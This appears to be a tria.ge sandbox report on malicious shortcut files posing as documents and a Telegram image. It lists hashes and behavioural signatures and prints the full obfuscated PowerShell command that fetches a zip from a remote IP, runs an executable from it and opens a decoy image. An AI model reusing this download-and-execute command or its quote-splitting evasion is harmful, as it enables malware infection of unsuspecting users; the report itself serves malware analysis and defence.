Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
1brt_1_0147.doc.lnk
windows7-x64
3brt_1_0147.doc.lnk
windows10-2004-x64
10oshad_88.docx.lnk
windows7-x64
3oshad_88.docx.lnk
windows10-2004-x64
10rv_luti_20...sx.lnk
windows7-x64
3rv_luti_20...sx.lnk
windows10-2004-x64
10telegrama_...pg.lnk
windows7-x64
3telegrama_...pg.lnk
windows10-2004-x64
10Analysis
-
max time kernel
16s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
31/08/2024, 01:02
Static task
static1
Behavioral task
behavioral1
Sample
brt_1_0147.doc.lnk
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
brt_1_0147.doc.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
oshad_88.docx.lnk
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
oshad_88.docx.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win7-20240708-en
Behavioral task
behavioral6
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
telegrama_ksv_po_btgr.jpg.lnk
Resource
win7-20240729-en
General
-
Target
telegrama_ksv_po_btgr.jpg.lnk
-
Size
691KB
-
MD5
27fea6f5fbaffbbf1479cd9dfa9604fa
-
SHA1
ffe89c8b62b0faf639b056972db1a1974c53efa0
-
SHA256
df7d2e54b67a7788dd7c326a6c2a1c5b935b94288622fb7bbeff3ba336205cd7
-
SHA512
e901089462cd9d54f6de3d98ddaf10d94a3b1dc8ad5fb48f7facf0e3b8afcd97aa0caf3616f6548dcc3bb7e1eb8d6bc476bb8387c7cb0f689d0bab023c5deba5
-
SSDEEP
48:8xmuavUQSsejrK5053YMEDo//pxCMGopDDo/39OKXJa7x:8xy86enc+3hX/pxC530KXJQ
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 812 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 812 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1244 wrote to memory of 812 1244 cmd.exe 31 PID 1244 wrote to memory of 812 1244 cmd.exe 31 PID 1244 wrote to memory of 812 1244 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\telegrama_ksv_po_btgr.jpg.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1244 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo LCgtGMtcQQJaJlfGEbTWGQtHPnXvshSydqPjdadyHUqlchGjSeaWM; echo oIhdvwvvpCFrPXEuFwytiupeuuztBsyBbTIlLfifAJQuXhxp; echo HOoXHdZuZstQdflDScvNdstDTjusTXRkquolxTidEJXSlFbSdEjjTwx; if (-not(Test-Path 'signalmessenger.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/signalmessenger.zip -OutFile signalmessenger.zip}; echo jrJBbRkXWBdTmxLNkFmKcFkZNZRRTGZzEWLuBEZHNAvBPkncUoAZKvCdHl; Expand-Archive -Path signalmessenger.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/Newfts.exe; echo JuhGhuKkmGFuLZMyQwPXHdhWkLqUpKudPsEClUijthIIp; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/racs/telegrama_ksv_po_btgr.jpg -OutFile telegrama_ksv_po_btgr.jpg; echo CndnhqGwRKEgfnUJozdJravfXsLW; s''t''a''rt telegrama_ksv_po_btgr.jpg2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:812
-